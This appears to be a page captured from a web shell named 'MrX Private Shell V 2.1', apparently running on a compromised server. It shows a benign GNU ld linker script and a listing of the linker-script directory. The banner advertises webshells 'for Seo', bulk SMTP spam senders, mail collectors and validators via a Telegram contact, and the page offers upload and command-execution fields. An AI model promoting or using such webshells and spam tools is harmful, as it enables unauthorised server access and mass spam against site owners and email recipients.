__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* Script for --enable-auto-import */
/* Copyright (C) 2014-2025 Free Software Foundation, Inc.
   Copying and distribution of this script, with or without modification,
   are permitted in any medium without royalty provided the copyright
   notice and this notice are preserved.  */
OUTPUT_FORMAT(pei-x86-64)
SEARCH_DIR("=/usr/local/lib/x86_64-linux-gnu"); SEARCH_DIR("=/lib/x86_64-linux-gnu"); SEARCH_DIR("=/usr/lib/x86_64-linux-gnu"); SEARCH_DIR("=/usr/local/lib"); SEARCH_DIR("=/lib"); SEARCH_DIR("=/usr/lib"); SEARCH_DIR("=/usr/x86_64-pep/lib");
SECTIONS
{
  /* Make the virtual address and file offset synced if the alignment is
     lower than the target page size. */
  . = SIZEOF_HEADERS;
  . = ALIGN(__section_alignment__);
  .text  __image_base__ + ( __section_alignment__ < 0x1000 ? . : __section_alignment__ ) :
  {
    KEEP (*(SORT_NONE(.init)))
    *(.text)
    *(SORT(.text$*))
     *(.text.*)
     *(.gnu.linkonce.t.*)
    *(.glue_7t)
    *(.glue_7)
    . = ALIGN(8);
    KEEP (*(SORT_NONE(.fini)))
    /* ??? Why is .gcc_exc here?  */
     *(.gcc_exc)
    PROVIDE (etext = .);
     KEEP (*(.gcc_except_table))
  }
  /* The Cygwin32 library uses a section to avoid copying certain data
     on fork.  This used to be named ".data".  The linker used
     to include this between __data_start__ and __data_end__, but that
     breaks building the cygwin32 dll.  Instead, we name the section
     ".data_cygwin_nocopy" and explicitly include it after __data_end__. */
  .data BLOCK(__section_alignment__) :
  {
    __data_start__ = . ;
    *(.data)
    *(.data2)
    *(SORT(.data$*))
	    *(.rdata)
	    *(SORT(.rdata$*))
    KEEP(*(.jcr))
    __data_end__ = . ;
    *(.data_cygwin_nocopy)
  }
  .rdata BLOCK(__section_alignment__) :
  {
    . = ALIGN(4);
    __rt_psrelocs_start = .;
    KEEP(*(.rdata_runtime_pseudo_reloc))
    __rt_psrelocs_end = .;
    /* .ctors & .dtors */
    . = ALIGN(8);
       /* Note: we always define __CTOR_LIST__ and ___CTOR_LIST__ here,
          we do not PROVIDE them.  This is because the ctors.o startup
	  code in libgcc defines them as common symbols, with the
          expectation that they will be overridden by the definitions
	  here.  If we PROVIDE the symbols then they will not be
	  overridden and global constructors will not be run.
	  See PR 22762 for more details.

	  This does mean that it is not possible for a user to define
	  their own __CTOR_LIST__ and __DTOR_LIST__ symbols; if they do,
	  the content from those variables are included but the symbols
	  defined here silently take precedence.  If they truly need to
	  be redefined, a custom linker script will have to be used.
	  (The custom script can just be a copy of this script with the
	  PROVIDE() qualifiers added).
	  In particular this means that ld -Ur does not work, because
	  the proper __CTOR_LIST__ set by ld -Ur is overridden by a
	  bogus __CTOR_LIST__ set by the final link.  See PR 46.  */
       ___CTOR_LIST__ = .;
       __CTOR_LIST__ = .;
       LONG (-1); LONG (-1);
       KEEP (*(.ctors));
       KEEP (*(.ctor));
       KEEP (*(SORT_BY_NAME(.ctors.*)));
       LONG (0); LONG (0);
       /* See comment about __CTOR_LIST__ above.  The same reasoning
    	  applies here too.  */
       ___DTOR_LIST__ = .;
       __DTOR_LIST__ = .;
       LONG (-1); LONG (-1);
       KEEP (*(.dtors));
       KEEP (*(.dtor));
       KEEP (*(SORT_BY_NAME(.dtors.*)));
       LONG (0); LONG (0);
    /* .CRT */
    ___crt_xc_start__ = . ;
    KEEP (*(SORT(.CRT$XC*)))  /* C initialization */
    ___crt_xc_end__ = . ;
    ___crt_xi_start__ = . ;
    KEEP (*(SORT(.CRT$XI*)))  /* C++ initialization */
    ___crt_xi_end__ = . ;
    ___crt_xl_start__ = . ;
    KEEP (*(SORT(.CRT$XL*)))  /* TLS callbacks */
    /* ___crt_xl_end__ is defined in the TLS Directory support code */
    ___crt_xp_start__ = . ;
    KEEP (*(SORT(.CRT$XP*)))  /* Pre-termination */
    ___crt_xp_end__ = . ;
    ___crt_xt_start__ = . ;
    KEEP (*(SORT(.CRT$XT*)))  /* Termination */
    ___crt_xt_end__ = . ;
    ___crt_xd_start__ = . ;
    KEEP (*(SORT(.CRT$XD*)))  /* Dynamic TLS Initializer */
    ___crt_xd_end__ = . ;
  }
  ___RUNTIME_PSEUDO_RELOC_LIST_END__ = __rt_psrelocs_end;
  __RUNTIME_PSEUDO_RELOC_LIST_END__ = __rt_psrelocs_end;
  ___RUNTIME_PSEUDO_RELOC_LIST__ = __rt_psrelocs_start;
  __RUNTIME_PSEUDO_RELOC_LIST__ = __rt_psrelocs_start;
  .eh_frame BLOCK(__section_alignment__) :
  {
    KEEP (*(.eh_frame*))
  }
  .pdata BLOCK(__section_alignment__) :
  {
    KEEP(*(.pdata*))
  }
  .xdata BLOCK(__section_alignment__) :
  {
    KEEP(*(.xdata*))
  }
  .bss BLOCK(__section_alignment__) :
  {
    __bss_start__ = . ;
    *(.bss)
    *(COMMON)
    __bss_end__ = . ;
  }
  .edata BLOCK(__section_alignment__) :
  {
    *(.edata)
  }
  /DISCARD/ :
  {
    *(.debug$S)
    *(.debug$T)
    *(.debug$F)
     *(.drectve)
     *(.note.GNU-stack)
     *(.gnu.lto_*)
     *(.gnu_object_only)
  }
  .idata BLOCK(__section_alignment__) :
  {
    /* This cannot currently be handled with grouped sections.
	See pep.em:sort_sections.  */
    KEEP (SORT(*)(.idata$2))
    KEEP (SORT(*)(.idata$3))
    /* These zeroes mark the end of the import list.  */
    LONG (0); LONG (0); LONG (0); LONG (0); LONG (0);
    . = ALIGN(8);
    KEEP (SORT(*)(.idata$4))
    __IAT_start__ = .;
    SORT(*)(.idata$5)
    __IAT_end__ = .;
    KEEP (SORT(*)(.idata$6))
    KEEP (SORT(*)(.idata$7))
  }
  /* Windows TLS expects .tls$AAA to be at the start and .tls$ZZZ to be
     at the end of the .tls section.  This is important because _tls_start MUST
     be at the beginning of the section to enable SECREL32 relocations with TLS
     data.  */
  .tls BLOCK(__section_alignment__) :
  {
    ___tls_start__ = . ;
    KEEP (*(.tls$AAA))
    KEEP (*(.tls))
    KEEP (*(.tls$))
    KEEP (*(SORT(.tls$*)))
    KEEP (*(.tls$ZZZ))
    ___tls_end__ = . ;
  }
  .endjunk BLOCK(__section_alignment__) :
  {
    /* end is deprecated, don't use it */
    PROVIDE (end = .);
    PROVIDE ( _end = .);
     __end__ = .;
  }
  .rsrc BLOCK(__section_alignment__) : SUBALIGN(4)
  {
    KEEP (*(.rsrc))
    KEEP (*(.rsrc$*))
  }
  .reloc BLOCK(__section_alignment__) :
  {
    *(.reloc)
  }
  .stab BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.stab)
  }
  .stabstr BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.stabstr)
  }
  /* DWARF debug sections.
     Symbols in the DWARF debugging sections are relative to the beginning
     of the section.  Unlike other targets that fake this by putting the
     section VMA at 0, the PE format will not allow it.  */
  /* DWARF 1.1 and DWARF 2.  */
  .debug_aranges BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_aranges)
  }
  .zdebug_aranges BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_aranges)
  }
  .debug_pubnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_pubnames)
  }
  .zdebug_pubnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_pubnames)
  }
  /* DWARF 2.  */
  .debug_info BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_info .gnu.linkonce.wi.*)
  }
  .zdebug_info BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_info .zdebug.gnu.linkonce.wi.*)
  }
  .debug_abbrev BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_abbrev)
  }
  .zdebug_abbrev BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_abbrev)
  }
  .debug_line BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_line)
  }
  .zdebug_line BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_line)
  }
  .debug_frame BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_frame*)
  }
  .zdebug_frame BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_frame*)
  }
  .debug_str BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_str)
  }
  .zdebug_str BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_str)
  }
  .debug_loc BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_loc)
  }
  .zdebug_loc BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_loc)
  }
  .debug_macinfo BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_macinfo)
  }
  .zdebug_macinfo BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_macinfo)
  }
  /* SGI/MIPS DWARF 2 extensions.  */
  .debug_weaknames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_weaknames)
  }
  .zdebug_weaknames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_weaknames)
  }
  .debug_funcnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_funcnames)
  }
  .zdebug_funcnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_funcnames)
  }
  .debug_typenames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_typenames)
  }
  .zdebug_typenames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_typenames)
  }
  .debug_varnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_varnames)
  }
  .zdebug_varnames BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_varnames)
  }
  /* DWARF 3.  */
  .debug_pubtypes BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_pubtypes)
  }
  .zdebug_pubtypes BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_pubtypes)
  }
  .debug_ranges BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_ranges)
  }
  .zdebug_ranges BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_ranges)
  }
  /* DWARF 4.  */
  .debug_types BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_types .gnu.linkonce.wt.*)
  }
  .zdebug_types BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_types .gnu.linkonce.wt.*)
  }
  /* DWARF 5.  */
  .debug_addr BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_addr)
  }
  .zdebug_addr BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_addr)
  }
  .debug_line_str BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_line_str)
  }
  .zdebug_line_str BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_line_str)
  }
  .debug_loclists BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_loclists)
  }
  .zdebug_loclists BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_loclists)
  }
  .debug_macro BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_macro)
  }
  .zdebug_macro BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_macro)
  }
  .debug_names BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_names)
  }
  .zdebug_names BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_names)
  }
  .debug_rnglists BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_rnglists)
  }
  .zdebug_rnglists BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_rnglists)
  }
  .debug_str_offsets BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_str_offsets)
  }
  .zdebug_str_offsets BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_str_offsets)
  }
  .debug_sup BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_sup)
  }
  /* For Go and Rust.  */
  .debug_gdb_scripts BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.debug_gdb_scripts)
  }
  .zdebug_gdb_scripts BLOCK(__section_alignment__) (NOLOAD) :
  {
    *(.zdebug_gdb_scripts)
  }
}

Filemanager

Name Type Size Permission Actions
elf32_x86_64.x File 10.99 KB 0644
elf32_x86_64.xbn File 10.8 KB 0644
elf32_x86_64.xc File 10.65 KB 0644
elf32_x86_64.xce File 10.98 KB 0644
elf32_x86_64.xcer File 10.93 KB 0644
elf32_x86_64.xd File 10.86 KB 0644
elf32_x86_64.xdc File 10.55 KB 0644
elf32_x86_64.xdce File 10.89 KB 0644
elf32_x86_64.xdcer File 10.83 KB 0644
elf32_x86_64.xde File 11.2 KB 0644
elf32_x86_64.xder File 11.14 KB 0644
elf32_x86_64.xdw File 10.51 KB 0644
elf32_x86_64.xdwe File 10.85 KB 0644
elf32_x86_64.xdwer File 10.79 KB 0644
elf32_x86_64.xe File 11.29 KB 0644
elf32_x86_64.xer File 11.24 KB 0644
elf32_x86_64.xn File 10.96 KB 0644
elf32_x86_64.xr File 6.5 KB 0644
elf32_x86_64.xs File 10.49 KB 0644
elf32_x86_64.xsc File 10.18 KB 0644
elf32_x86_64.xsce File 10.52 KB 0644
elf32_x86_64.xscer File 10.46 KB 0644
elf32_x86_64.xse File 10.83 KB 0644
elf32_x86_64.xser File 10.77 KB 0644
elf32_x86_64.xsw File 10.14 KB 0644
elf32_x86_64.xswe File 10.48 KB 0644
elf32_x86_64.xswer File 10.42 KB 0644
elf32_x86_64.xu File 6.52 KB 0644
elf32_x86_64.xw File 10.61 KB 0644
elf32_x86_64.xwe File 10.95 KB 0644
elf32_x86_64.xwer File 10.89 KB 0644
elf_i386.x File 10.27 KB 0644
elf_i386.xbn File 10.07 KB 0644
elf_i386.xc File 10.05 KB 0644
elf_i386.xce File 10.39 KB 0644
elf_i386.xcer File 10.33 KB 0644
elf_i386.xd File 10.13 KB 0644
elf_i386.xdc File 9.95 KB 0644
elf_i386.xdce File 10.29 KB 0644
elf_i386.xdcer File 10.23 KB 0644
elf_i386.xde File 10.47 KB 0644
elf_i386.xder File 10.41 KB 0644
elf_i386.xdw File 9.91 KB 0644
elf_i386.xdwe File 10.25 KB 0644
elf_i386.xdwer File 10.2 KB 0644
elf_i386.xe File 10.57 KB 0644
elf_i386.xer File 10.51 KB 0644
elf_i386.xn File 10.23 KB 0644
elf_i386.xr File 6.24 KB 0644
elf_i386.xs File 9.76 KB 0644
elf_i386.xsc File 9.58 KB 0644
elf_i386.xsce File 9.92 KB 0644
elf_i386.xscer File 9.86 KB 0644
elf_i386.xse File 10.1 KB 0644
elf_i386.xser File 10.04 KB 0644
elf_i386.xsw File 9.54 KB 0644
elf_i386.xswe File 9.88 KB 0644
elf_i386.xswer File 9.82 KB 0644
elf_i386.xu File 6.26 KB 0644
elf_i386.xw File 10.01 KB 0644
elf_i386.xwe File 10.35 KB 0644
elf_i386.xwer File 10.29 KB 0644
elf_iamcu.x File 9.96 KB 0644
elf_iamcu.xbn File 9.77 KB 0644
elf_iamcu.xc File 9.75 KB 0644
elf_iamcu.xce File 10.09 KB 0644
elf_iamcu.xcer File 10.03 KB 0644
elf_iamcu.xd File 9.83 KB 0644
elf_iamcu.xdc File 9.65 KB 0644
elf_iamcu.xdce File 9.99 KB 0644
elf_iamcu.xdcer File 9.93 KB 0644
elf_iamcu.xde File 10.17 KB 0644
elf_iamcu.xder File 10.11 KB 0644
elf_iamcu.xdw File 9.61 KB 0644
elf_iamcu.xdwe File 9.95 KB 0644
elf_iamcu.xdwer File 9.89 KB 0644
elf_iamcu.xe File 10.27 KB 0644
elf_iamcu.xer File 10.21 KB 0644
elf_iamcu.xn File 9.93 KB 0644
elf_iamcu.xr File 6.18 KB 0644
elf_iamcu.xs File 9.46 KB 0644
elf_iamcu.xsc File 9.28 KB 0644
elf_iamcu.xsce File 9.62 KB 0644
elf_iamcu.xscer File 9.56 KB 0644
elf_iamcu.xse File 9.8 KB 0644
elf_iamcu.xser File 9.74 KB 0644
elf_iamcu.xsw File 9.24 KB 0644
elf_iamcu.xswe File 9.58 KB 0644
elf_iamcu.xswer File 9.52 KB 0644
elf_iamcu.xu File 6.2 KB 0644
elf_iamcu.xw File 9.71 KB 0644
elf_iamcu.xwe File 10.05 KB 0644
elf_iamcu.xwer File 9.99 KB 0644
elf_x86_64.x File 10.86 KB 0644
elf_x86_64.xbn File 10.67 KB 0644
elf_x86_64.xc File 10.52 KB 0644
elf_x86_64.xce File 10.85 KB 0644
elf_x86_64.xcer File 10.8 KB 0644
elf_x86_64.xd File 10.73 KB 0644
elf_x86_64.xdc File 10.42 KB 0644
elf_x86_64.xdce File 10.76 KB 0644
elf_x86_64.xdcer File 10.7 KB 0644
elf_x86_64.xde File 11.07 KB 0644
elf_x86_64.xder File 11.01 KB 0644
elf_x86_64.xdw File 10.38 KB 0644
elf_x86_64.xdwe File 10.72 KB 0644
elf_x86_64.xdwer File 10.66 KB 0644
elf_x86_64.xe File 11.17 KB 0644
elf_x86_64.xer File 11.11 KB 0644
elf_x86_64.xn File 10.83 KB 0644
elf_x86_64.xr File 6.5 KB 0644
elf_x86_64.xs File 10.36 KB 0644
elf_x86_64.xsc File 10.05 KB 0644
elf_x86_64.xsce File 10.39 KB 0644
elf_x86_64.xscer File 10.33 KB 0644
elf_x86_64.xse File 10.7 KB 0644
elf_x86_64.xser File 10.64 KB 0644
elf_x86_64.xsw File 10.01 KB 0644
elf_x86_64.xswe File 10.35 KB 0644
elf_x86_64.xswer File 10.29 KB 0644
elf_x86_64.xu File 6.52 KB 0644
elf_x86_64.xw File 10.48 KB 0644
elf_x86_64.xwe File 10.82 KB 0644
elf_x86_64.xwer File 10.76 KB 0644
i386pe.x File 10.49 KB 0644
i386pe.xa File 10.47 KB 0644
i386pe.xbn File 10.46 KB 0644
i386pe.xe File 10.47 KB 0644
i386pe.xer File 10.48 KB 0644
i386pe.xn File 10.46 KB 0644
i386pe.xr File 4.57 KB 0644
i386pe.xu File 6.01 KB 0644
i386pep.x File 10.83 KB 0644
i386pep.xa File 10.82 KB 0644
i386pep.xbn File 10.8 KB 0644
i386pep.xe File 10.81 KB 0644
i386pep.xer File 10.83 KB 0644
i386pep.xn File 10.8 KB 0644
i386pep.xr File 4.82 KB 0644
i386pep.xu File 6.34 KB 0644
stamp File 0 B 0644
Filemanager